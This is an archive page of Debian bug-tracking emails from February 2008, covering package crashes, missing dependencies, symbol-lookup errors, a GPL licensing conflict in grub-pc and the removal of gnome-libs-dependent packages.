with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464889: marked as done (tcpwatch-httpproxy: missing dependency on python-tk)

2008-02-10 Thread Debian Bug Tracking System
Your message dated Sun, 10 Feb 2008 15:17:04 +
with message-id [EMAIL PROTECTED]
and subject line Bug#464889: fixed in tcpwatch-httpproxy 1.3b-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

---BeginMessage---
Package: tcpwatch-httpproxy
Version: 1.3b-1
Severity: grave
Justification: renders package unusable


$ tcpwatch-httpproxy -L8000:80
Traceback (most recent call last):
  File /usr/bin/tcpwatch-httpproxy, line 1485, in ?
main(sys.argv[1:])
  File /usr/bin/tcpwatch-httpproxy, line 1427, in main
obs_factory, mainloop = setupTk(titlepart, config_info, colorized)
  File /usr/bin/tcpwatch-httpproxy, line 475, in setupTk
import Tkinter
  File /usr/lib/python2.4/lib-tk/Tkinter.py, line 41, in ?
raise ImportError, str(msg) + ', please install the python-tk package'
ImportError: No module named _tkinter, please install the python-tk package

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (990, 'testing'), (300, 'unstable'), (200, 'stable'), (1, 
'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.23 (SMP w/2 CPU cores; PREEMPT)
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) (ignored: LC_ALL set to 
en_US)
Shell: /bin/sh linked to /bin/bash

Versions of packages tcpwatch-httpproxy depends on:
ii  python2.4.4-6An interactive high-level object-o

Versions of packages tcpwatch-httpproxy recommends:
ii  funkload  1.6.2-3web testing tool

-- no debconf information


---End Message---
---BeginMessage---
Source: tcpwatch-httpproxy
Source-Version: 1.3b-2

We believe that the bug you reported is fixed in the latest version of
tcpwatch-httpproxy, which is due to be installed in the Debian FTP archive:

tcpwatch-httpproxy_1.3b-2.diff.gz
  to pool/main/t/tcpwatch-httpproxy/tcpwatch-httpproxy_1.3b-2.diff.gz
tcpwatch-httpproxy_1.3b-2.dsc
  to pool/main/t/tcpwatch-httpproxy/tcpwatch-httpproxy_1.3b-2.dsc
tcpwatch-httpproxy_1.3b-2_all.deb
  to pool/main/t/tcpwatch-httpproxy/tcpwatch-httpproxy_1.3b-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Toni Mueller [EMAIL PROTECTED] (supplier of updated tcpwatch-httpproxy 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun, 10 Feb 2008 16:09:40 +0100
Source: tcpwatch-httpproxy
Binary: tcpwatch-httpproxy
Architecture: source all
Version: 1.3b-2
Distribution: unstable
Urgency: low
Maintainer: Toni Mueller [EMAIL PROTECTED]
Changed-By: Toni Mueller [EMAIL PROTECTED]
Description: 
 tcpwatch-httpproxy - TCP monitoring and logging tool with support for HTTP 1.1
Closes: 464889
Changes: 
 tcpwatch-httpproxy (1.3b-2) unstable; urgency=low
 .
   * added dependency on python-tk (Closes: #464889)
Files: 
 b841d7943920548d9469e5bb8fa5a9e0 633 net extra tcpwatch-httpproxy_1.3b-2.dsc
 c3bedced17f1ebccb717e9a43ea3b355 4592 net extra 
tcpwatch-httpproxy_1.3b-2.diff.gz
 6194a7f9f23e24f3264bc8cd298a15fd 16934 net extra 
tcpwatch-httpproxy_1.3b-2_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHrxPqfoEUoHXLGtIRAgh4AJ4m9k0LME8029sZeGNv1XP9AQLAgACfY2jG
fw82YyLLHgw51R7xpf88A8Q=
=lrV2
-END PGP SIGNATURE-


---End Message---


Processed: Re: Bug#465066: gappletviewer-4.3: empty package on arm* and mips*

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 465066 wishlist
Bug#465066: gappletviewer-4.3: empty package on arm* and mips*
Severity set to `wishlist' from `grave'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions

2008-02-10 Thread Frans Pop
(CC to virtualbox maintainers as a heads-up)

virtualbox-ose is affected too (amd64):

/usr/lib/virtualbox/VirtualBox: symbol lookup error:
/usr/lib/virtualbox/VirtualBox: undefined symbol: stat64

Downgrading libqt3-mt to 3:3.3.7-9 solved the issue.

Cheers,
FJP


signature.asc
Description: This is a digitally signed message part.


Bug#465066: gappletviewer-4.3: empty package on arm* and mips*

2008-02-10 Thread Matthias Klose
severity 465066 wishlist
thanks

not release critical. we can reenable those if xulrunner is available
and built on these archs. xulrunner has too strict dependencies
between arch-indep and arch packages.

Niko Tyni writes:
 Package: gappletviewer-4.3
 Version: 4.3-20080202-1
 Severity: grave
 Justification: renders package unusable
 
 The gappletviewer-4.3 package is empty on those architectures
 that aren't configured 'with_java_plugin': armel arm m68k mips mipsel.
 
 These empty packages are useless; please build the package only for the
 supported architectures and have the others removed from the archive.
 
 (This applies to -4.2 as well, I'll clone the bug later.)

no, please do not.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465035: libcomplearn-mod-ppmdx: FTBFS on 64 bit arches.

2008-02-10 Thread Kurt Roeckx
On Sun, Feb 10, 2008 at 07:09:31AM -0800, Rudi Cilibrasi wrote:
 Hi Kurt,
 
 Thanks for the interest.  The reason I have restricted 64-bit
 architectures is because the maintainer of ppmd told me that ppmd does
 not work on 64-bit architectures.  The packages build, but I am told
 they do not work.  Was I misinformed?  (have you gotten any to work on
 64-bit?)

I haven't tried, I have no idea what it does.  Like I said, in that case
you should get the binaries in unstable for the affected arches removed.


Kurt




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464975: plone3-site: Upgrading to 3.0.5-2 breaks plone cmf

2008-02-10 Thread Fabio Tranchitella
Hello,

* 2008-02-10 16:57, Soren Stoutner wrote:
 I'm using the plone3-site instance, created by older versions of plone 2.
 
 Everything was under /var/lib/zope2.10/instance/plone-site.  I moved it
 all to /var/lib/zope2.10/plone3-site and updated /etc/zope2.10/zope.conf
 but I still get the same error. 

plone-site (plone 2.5.x serie) was using zope2.9, so I suppose you moved
everything from /var/lib/zope2.9/instance/plone-site, is it correct?

Anyway, could you please send my the tar.gz of
/var/lib/zope2.10/instance/plone3-site (without the Data.fs*, of course) so
I can inspect it?

Thanks,

-- 
Fabio Tranchitella http://www.kobold.it
Free Software Developer and Consultant http://www.tranchitella.it
_
1024D/7F961564, fpr 5465 6E69 E559 6466 BF3D 9F01 2BF8 EE2B 7F96 1564



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 465056

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 tags 465056 pending
Bug#465056: grub-pc violates the GPL
There were no tags set.
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465028: not only amd64

2008-02-10 Thread Patrick Winnertz
Please note that this error is not only available on amd64 machines, but 
also on my i386 laptop. 
virtualbox fails with the failure described in #465029.

Atm I'm checking if a rebuild of virtualbox helps to get rid of this issue.

Greetings
Winnie
-- 
 .''`.   Patrick Winnertz [EMAIL PROTECTED]
:  :' :  GNU/Linux Debian Developer
`. `'`   http://www.der-winnie.de http://people.skolelinux.org/~winnie
  `-  Debian - when you have better things to do than fixing systems


signature.asc
Description: This is a digitally signed message part.


Processed: your mail

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 severity 465029 serious
Bug#465029: virtualbox-ose: undefined symbol: stat64
Severity set to `serious' from `important'

 merge 465029 465028
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug#465046: symbol lookup error
Merged 465028 465029 465046.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed (with 1 errors): your mail

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reassign 465029 libqt3-mt
Bug#465029: virtualbox-ose: undefined symbol: stat64
Bug reassigned from package `virtualbox-ose' to `libqt3-mt'.

 merge 465029 465028
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465029: virtualbox-ose: undefined symbol: stat64
Mismatch - only Bugs in same state can be merged:
Values for `severity' don't match:
 #465028 has `serious';
 #465029 has `important'

 reassign 465046 libqt3-mt
Bug#465046: symbol lookup error
Bug reassigned from package `ktorrent' to `libqt3-mt'.

 merge 465046 465028
Bug#465028: libqt3-mt: Missing weak symbols for stat64 functions
Bug#465046: symbol lookup error
Merged 465028 465046.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465085: prelude-manager segfault on new client connection

2008-02-10 Thread Olivier Tetard
Package: prelude-manager
Version: 0.9.11-1
Severity: grave
Justification: renders package unusable

Hello,

Since prelude-manager 0.9.11-1, I am unable to get a client connected
to it without having the manager segfaulting.

Here is the prelude-manager log when running it into gdb:

% sudo gdb prelude-manager
GNU gdb 6.7.1-debian
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as i486-linux-gnu...
(no debugging symbols found)
Using host libthread_db library /lib/i686/cmov/libthread_db.so.1.
(gdb) r
Starting program: /usr/sbin/prelude-manager 
(no debugging symbols found)
Failed to read a valid object file image from memory.
[Thread debugging using libthread_db enabled]
[New Thread 0xb7b916b0 (LWP 18974)]
10 Feb 17:12:47 (process:18974) INFO: Subscribing Normalize to active decoding 
plugins.
10 Feb 17:12:47 (process:18974) INFO: server started (listening on 127.0.0.1 
port 4690).
10 Feb 17:12:48 (process:18974) INFO: Subscribing db[default] to active 
reporting plugins.
10 Feb 17:12:48 (process:18974) INFO: Subscribing Debug[default] to active 
reporting plugins.
[New Thread 0xb7392b90 (LWP 18977)]
[New Thread 0xb6b91b90 (LWP 18999)]
10 Feb 17:13:11 (process:18974) INFO: [127.0.0.1:57220 0x197b2477bceb9 
idmef:w]: TLS authentication succeed: client certificate is trusted.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb6b91b90 (LWP 18999)]
0xb7cc133c in free () from /lib/i686/cmov/libc.so.6
(gdb) 
(gdb) quit
The program is running.  Exit anyway? (y or n) y
% 

Here is the client side:

% python player.py
10 Feb 17:13:11 (process:18998) INFO: Connecting to 127.0.0.1:4690 prelude 
Manager server.
10 Feb 17:13:39 (process:18998) WARNING: Failover enabled: connection error 
with 127.0.0.1:4690: End of file.

In order to register this sensor, please run:
prelude-admin register MyPlayer idmef:w 127.0.0.1 --uid 1000 --gid 100
% 

Thanks,
Olivier;

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-debian4-1
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages prelude-manager depends on:
ii  adduser3.105 add and remove users and groups
ii  dbconfig-common1.8.36common framework for packaging dat
ii  libc6  2.7-6 GNU C Library: Shared libraries
ii  libgcrypt111.4.0-3   LGPL Crypto library - runtime libr
ii  libgnutls262.2.1-3   the GNU TLS library - runtime libr
ii  libprelude20.9.16.2-1Hybrid Intrusion Detection System 
ii  libpreludedb0  0.9.14.1-1Hybrid Intrusion Detection System 
ii  libxml22.6.31.dfsg-1 GNOME XML library
ii  ucf3.004 Update Configuration File: preserv

Versions of packages prelude-manager recommends:
ii  mysql-client-5.1 [mysql-clien 5.1.22rc-1 MySQL database client binaries

-- debconf information:
  prelude-manager/db/basepath:
  prelude-manager/missing-db-package-error: abort
  prelude-manager/pgsql/authmethod-admin: ident
  prelude-manager/pgsql/no-empty-passwords:
  prelude-manager/internal/skip-preseed: false
  prelude-manager/pgsql/method: unix socket
  prelude-manager/passwords-do-not-match:
  prelude-manager/pgsql/changeconf: false
  prelude-manager/pgsql/admin-user: postgres
  prelude-manager/install-error: abort
  prelude-manager/internal/reconfiguring: true
  prelude-manager/dbconfig-remove:
  prelude-manager/upgrade-backup: true
  prelude-manager/pgsql/authmethod-user: password
* prelude-manager/mysql/admin-user: root
* prelude-manager/database-type: mysql
  prelude-manager/remote/port: 3306
* prelude-manager/mysql/method: unix socket
  prelude-manager/upgrade-error: abort
  prelude-manager/remove-error: abort
  prelude-manager/pgsql/manualconf:
* prelude-manager/db/dbname: preludemanager
  prelude-manager/purge: false
* prelude-manager/db/app-user: preludemanager
  prelude-manager/remote/host: localhost
* prelude-manager/dbconfig-install: false
  prelude-manager/remote/newhost:
* prelude-manager/dbconfig-reinstall: true
  prelude-manager/dbconfig-upgrade: true



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465056: grub-pc violates the GPL

2008-02-10 Thread Robert Millan
On Sun, Feb 10, 2008 at 02:33:28PM +0200, Adrian Bunk wrote:
 Package: grub-pc
 Version: 1.96+20080209-1
 Severity: critical
 
 grub-pc is licenced under the GPLv3+ [1].
 
 LZO 2.02 is licenced under the GPLv2 only.

Ok, since liblzo1 works fine, and it is GPLv2+ AFAICT, I'm downgrading the
dependency untill we have a better solution.

 Note:
 Markus Oberhumer told me that the next LZO version 2.03
 will be available under the GPLv2+.

Would be nice if you can ping me when that happens.

Thanks

-- 
Robert Millan

GPLv2 I know my rights; I want my phone call!
DRM What use is a phone call… if you are unable to speak?
(as seen on /.)



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465029: [Pkg-virtualbox-devel] Bug#465029: Bug#465029: virtualbox-ose: undefined symbol: stat64

2008-02-10 Thread Michael Hanke

On Sun, Feb 10, 2008 at 12:04:45PM +0100, Patrick Winnertz wrote:
 Am Sonntag, 10. Februar 2008 11:38:48 schrieb Michael Hanke:
  I checked that already and it does not seem to be the problem. I have
  this:
 
  [EMAIL PROTECTED]:/lib/modules/2.6.24-1-686$ uname -a
  Linux gandalf 2.6.24-1-686 #1 SMP Wed Feb 6 15:20:27 UTC 2008 i686
  GNU/Linux
 
  [EMAIL PROTECTED]:/lib/modules/2.6.24-1-686$ find . -name vboxdrv.ko
  ./extra/virtualbox-ose/vboxdrv.ko
 mh.. okay.
 
 What about building the module on your own?
 For this please install virtualbox-ose-source and then
 # m-a -t auto-install virtualbox-ose-source
 
 This module should be located under:
  /lib/modules/$KVERS/misc/vboxdrv.ko
 
 The module above is from linux-modules-extra and is prebuilded.
 
 If the module is builded please modprobe/or insmod it and make sure that 
 this and not the other one is loaded. 
 (The easiest thing would be: 
 rmmod vboxdrv; 
 insmod /lib/modules/$KVERS/misc/vboxdrv.ko;
 )
 
 Hopefully this helps to get rid of the error.
Sorry, I forgot to mention that I already tried this as well. I redid
everything with the explicite commands that you suggested and the
problem is still there (same error).

Additionally, I also think that it cannot be related to the module as the
VirtualBox GUI should even start without any module present (neither loaded
nor even installed).

I also gave the binary-only innotek package a tried and it works (same
kernel, ...). So I guess it cannot be a general problem.


Thanks,

Michael

-- 
GPG key:  1024D/3144BE0F Michael Hanke
http://apsy.gse.uni-magdeburg.de/hanke
ICQ: 48230050



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#460559: tetex-extra: aptitude remove tetex-extra fails

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reassign 460559 tex-common
Bug#460559: tetex-extra: aptitude remove tetex-extra fails
Bug reassigned from package `tetex-extra' to `tex-common'.

 retitle 460559 Needs to conflict with etch's version of the tetex packages
Bug#460559: tetex-extra: aptitude remove tetex-extra fails
Changed Bug title to `Needs to conflict with etch's version of the tetex 
packages' from `tetex-extra: aptitude remove tetex-extra fails'.

 clone 460559 -1
Bug#460559: Needs to conflict with etch's version of the tetex packages
Bug 460559 cloned as bug 465093.

 reassign -1 texlive-base-bin
Bug#465093: Needs to conflict with etch's version of the tetex packages
Bug reassigned from package `tex-common' to `texlive-base-bin'.

 retitle -1 manpages of updmap, fmtutil and texconfig should refer to 
 TeX-on-Debian docs
Bug#465093: Needs to conflict with etch's version of the tetex packages
Changed Bug title to `manpages of updmap, fmtutil and texconfig should refer to 
TeX-on-Debian docs' from `Needs to conflict with etch's version of the tetex 
packages'.

 severity 460559 serious
Bug#460559: Needs to conflict with etch's version of the tetex packages
Severity set to `serious' from `important'

 severity 460559 normal
Bug#460559: Needs to conflict with etch's version of the tetex packages
Severity set to `normal' from `serious'

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465091: pxsl-tools: Fails to install

2008-02-10 Thread Gábor Braun
Package: pxsl-tools
Version: 1.0-3
Severity: grave
Justification: renders package unusable

Installation of package fails with the following error

Hibák történtek a feldolgozáskor:
 pxsl-tools
E: Sub-process /usr/bin/dpkg returned an error code (1)
Nem sikerült telepíteni egy csomagot.  Helyreállítás megkisérlése:
Beállítás: pxsl-tools (1.0-3) ...
error in control file: `Files' value not specified at /usr/sbin/install-docs 
line 701, /usr/share/doc-base/pxsl-tools line 12.
dpkg: hibás feldolgozás: pxsl-tools (--configure):
 post-installation script alfolyamat 255 hibakóddal kilépett

Gábor Braun

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (990, 'stable'), (650, 'testing'), (600, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-5-686
Locale: LANG=hu_HU.UTF-8, LC_CTYPE=hu_HU.UTF-8 (charmap=UTF-8)

Versions of packages pxsl-tools depends on:
ii  libc6 2.7-6  GNU C Library: Shared libraries
ii  libgmp3c2 2:4.2.1+dfsg-4 Multiprecision arithmetic library

pxsl-tools recommends no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465095: mailscanner fails to start with FIELD_NAME not imported

2008-02-10 Thread Lukas Ruf
Package: mailscanner
Version: 4.58.9-2
Severity: grave
Justification: renders package unusable


The following error is reported when I attempt to start mailscanner:

Starting mail spam/virus scanner: MailScannerVariable $FIELD_NAME is not 
imported at /usr/share/MailScanner/MailScanner/Message.pm line 6367.
Variable $FIELD_NAME is not imported at 
/usr/share/MailScanner/MailScanner/Message.pm line 6370.
Global symbol $FIELD_NAME requires explicit package name at 
/usr/share/MailScanner/MailScanner/Message.pm line 6367.
Global symbol $FIELD_NAME requires explicit package name at 
/usr/share/MailScanner/MailScanner/Message.pm line 6370.
Compilation failed in require at /usr/sbin/MailScanner line 79.
BEGIN failed--compilation aborted at /usr/sbin/MailScanner line 79.
 failed!
invoke-rc.d: initscript mailscanner, action start failed.

Does anybody know how to resolve this problem?

Is it related to the following debconf setting?
  mailscanner/v3_upgrade: Don't upgrade
If so, how can I change that?

Thanks for any support

Kind regards,
Lukas


-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.23.9-euphrat (SMP w/2 CPU cores; PREEMPT)
Locale: LANG=en_IE, LC_CTYPE=en_IE (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages mailscanner depends on:
ii  debconf [debconf-2.0]   1.5.19   Debian configuration management sy
ii  libarchive-zip-perl 1.18-1   Module for manipulation of ZIP arc
ii  libcompress-zlib-perl   2.008-1  Perl module for creation and manip
ii  libconvert-binhex-perl  1.119+pristine-2 Perl5 module for extracting data f
ii  libconvert-tnef-perl0.17-5   Perl module to read TNEF files
ii  libdbd-sqlite3-perl 1.14-1   Perl DBI driver with a self-contai
ii  libfilesys-df-perl  0.92-3   Module to obtain filesystem disk s
ii  libhtml-parser-perl 3.56-1   A collection of modules that parse
ii  libmime-perl5.425-2  transitional dummy package
ii  libmime-tools-perl [lib 5.425-2  Perl5 modules for MIME-compliant m
ii  libnet-cidr-perl0.11-2   Manipulate IPv4/IPv6 netblocks in
ii  libsys-hostname-long-pe 1.4-1Figure out the long (fully-qualifi
ii  libsys-syslog-perl  0.24-1   Perl interface to the UNIX syslog(
ii  perl5.8.8-12 Larry Wall's Practical Extraction
ii  postfix [mail-transport 2.5.1~rc1-1  High-performance mail transport ag
ii  spamassassin3.2.3-1  Perl-based spam filter using text
ii  ucf 3.004Update Configuration File: preserv
ii  unzip   5.52-10  De-archiver for .zip files

Versions of packages mailscanner recommends:
pn  libnet-cidr-lite-perl none (no description available)
ii  ncftp 2:3.2.1-1  A user-friendly and well-featured
ii  tnef  1.4.3-2Tool to unpack MIME application/ms
ii  wget  1.10.2-3   retrieves files from the web

-- debconf information:
  mailscanner/v3_upgrade: Don't upgrade



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: your mail

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # for now, those bug aren't RC, though we'd _really_ like to see gnome-libs 
 go away for lenny
 severity 460759 important
Bug#460759: directory-administrator: your package depends from gnome-libs that 
is scheduled for removal
Severity set to `important' from `serious'

 severity 460760 important
Bug#460760: cheops-ng: your package depends from gnome-libs that is scheduled 
for removal
Severity set to `important' from `serious'

 severity 460767 important
Bug#460767: gbib: your package depends from gnome-libs that is scheduled for 
removal
Severity set to `important' from `serious'

 severity 460769 important
Bug#460769: gfslicer: your package depends from gnome-libs that is scheduled 
for removal
Severity set to `important' from `serious'

 severity 460772 important
Bug#460772: gmanedit: your package depends from gnome-libs that is scheduled 
for removal
Severity set to `important' from `serious'

 severity 460774 important
Bug#460774: gnome-lokkit: your package depends from gnome-libs that is 
scheduled for removal
Severity set to `important' from `serious'

 severity 460778 important
Bug#460778: soundtracker: your package depends from gnome-libs that is 
scheduled for removal
Severity set to `important' from `serious'

 severity 460779 important
Bug#460779: powershell: your package depends from gnome-libs that is scheduled 
for removal
Severity set to `important' from `serious'

 severity 460783 important
Bug#460783: xwine: your package depends from gnome-libs that is scheduled for 
removal
Severity set to `important' from `serious'

 severity 460785 important
Bug#460785: snac: your package depends from gnome-libs that is scheduled for 
removal
Severity set to `important' from `serious'

 severity 460792 important
Bug#460792: gtkgo: your package depends from gnome-libs that is scheduled for 
removal
Severity set to `important' from `serious'

 severity 460799 important
Bug#460799: telegnome: your package depends from gnome-libs that is scheduled 
for removal
Severity set to `important' from `serious'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: bloub

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 clone 460797 -1
Bug#460797: libgtk-perl: your package depends from gnome-libs that is scheduled 
for removal
Bug 460797 cloned as bug 465097.

 reassign -1 ftp.debian.org
Bug#465097: libgtk-perl: your package depends from gnome-libs that is scheduled 
for removal
Bug reassigned from package `libgtk-perl' to `ftp.debian.org'.

 retitle -1 RM: libgtk-perl -- RoQA; obsolete, gnome 1.x
Bug#465097: libgtk-perl: your package depends from gnome-libs that is scheduled 
for removal
Changed Bug title to `RM: libgtk-perl -- RoQA; obsolete, gnome 1.x' from 
`libgtk-perl: your package depends from gnome-libs that is scheduled for 
removal'.

 severity -1 normal
Bug#465097: RM: libgtk-perl -- RoQA; obsolete, gnome 1.x
Severity set to `normal' from `serious'

 reassign 460787 ftp.debian.org
Bug#460787: libglade: your package depends from gnome-libs that is scheduled 
for removal
Bug reassigned from package `libglade' to `ftp.debian.org'.

 retitle 460787 RM: libglade -- RoQA; obsolete, gnome 1.x
Bug#460787: libglade: your package depends from gnome-libs that is scheduled 
for removal
Changed Bug title to `RM: libglade -- RoQA; obsolete, gnome 1.x' from 
`libglade: your package depends from gnome-libs that is scheduled for removal'.

 severity 460787 normal
Bug#460787: RM: libglade -- RoQA; obsolete, gnome 1.x
Severity set to `normal' from `serious'

 block 460787 by 460786
Bug#460786: gtkgrepmail: your package depends from gnome-libs that is scheduled 
for removal
Bug#460787: RM: libglade -- RoQA; obsolete, gnome 1.x
Was not blocked by any bugs.
Blocking bugs of 460787 added: 460786

 block -1 by 460786
Bug#460786: gtkgrepmail: your package depends from gnome-libs that is scheduled 
for removal
Bug#465097: RM: libgtk-perl -- RoQA; obsolete, gnome 1.x
Was not blocked by any bugs.
Blocking bugs of 465097 added: 460786


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#460786: gtkgrepmail: your package depends from gnome-libs that is scheduled for removal

2008-02-10 Thread Pierre Habouzit
On Mon, Jan 14, 2008 at 10:57:08PM +, [EMAIL PROTECTED] wrote:
 Package: gtkgrepmail
 Severity: important
 User: [EMAIL PROTECTED]
 Usertags: gnome-1.x-removal
 
 Hi,
 
 Your package (gtkgrepmail) has been detected as depending on
 gnome-libs, which as per release goal, won't be shipped in lenny.

  Actually, even worse, your package is the sole blocker for libgtk-perl
and libglade removals (which has been filed). Please migrate your
package to perl-gtk2 or ask for its removal.

Cheers,
-- 
·O·  Pierre Habouzit
··O[EMAIL PROTECTED]
OOOhttp://www.madism.org


pgpk7YcVOz6rQ.pgp
Description: PGP signature


Bug#460791: terraform: your package depends from gnome-libs that is scheduled for removal

2008-02-10 Thread Pierre Habouzit
On Mon, Jan 14, 2008 at 10:57:08PM +, [EMAIL PROTECTED] wrote:
 Package: terraform
 Severity: important
 User: [EMAIL PROTECTED]
 Usertags: gnome-1.x-removal
 
 Hi,
 
 Your package (terraform) has been detected as depending on
 gnome-libs, which as per release goal, won't be shipped in lenny.

  On that road, we'd like to remove gnome-print, and your package is the
last one depending upon it, and removal of gnome-print has been filed
already.

Cheers,
-- 
·O·  Pierre Habouzit
··O[EMAIL PROTECTED]
OOOhttp://www.madism.org


pgpR95iQ2yxlJ.pgp
Description: PGP signature


Processed: blob

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 clone 460782 -1
Bug#460782: gnome-print: your package depends from gnome-libs that is scheduled 
for removal
Bug 460782 cloned as bug 465098.

 severity -1 normal
Bug#465098: gnome-print: your package depends from gnome-libs that is scheduled 
for removal
Severity set to `normal' from `serious'

 reassign -1 ftp.debian.org
Bug#465098: gnome-print: your package depends from gnome-libs that is scheduled 
for removal
Bug reassigned from package `gnome-print' to `ftp.debian.org'.

 retitle -1 RM: gnome-print -- RoQA; obsolete
Bug#465098: gnome-print: your package depends from gnome-libs that is scheduled 
for removal
Changed Bug title to `RM: gnome-print -- RoQA; obsolete' from `gnome-print: 
your package depends from gnome-libs that is scheduled for removal'.

 block -1 by 460791
Bug#460791: terraform: your package depends from gnome-libs that is scheduled 
for removal
Bug#465098: RM: gnome-print -- RoQA; obsolete
Was not blocked by any bugs.
Blocking bugs of 465098 added: 460791, 464337


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: closing 460789

2008-02-10 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.15
 close 460789
Bug#460789: gnomp3: your package depends from gnome-libs that is scheduled for 
removal
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug closed, send any further explanations to [EMAIL PROTECTED]


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
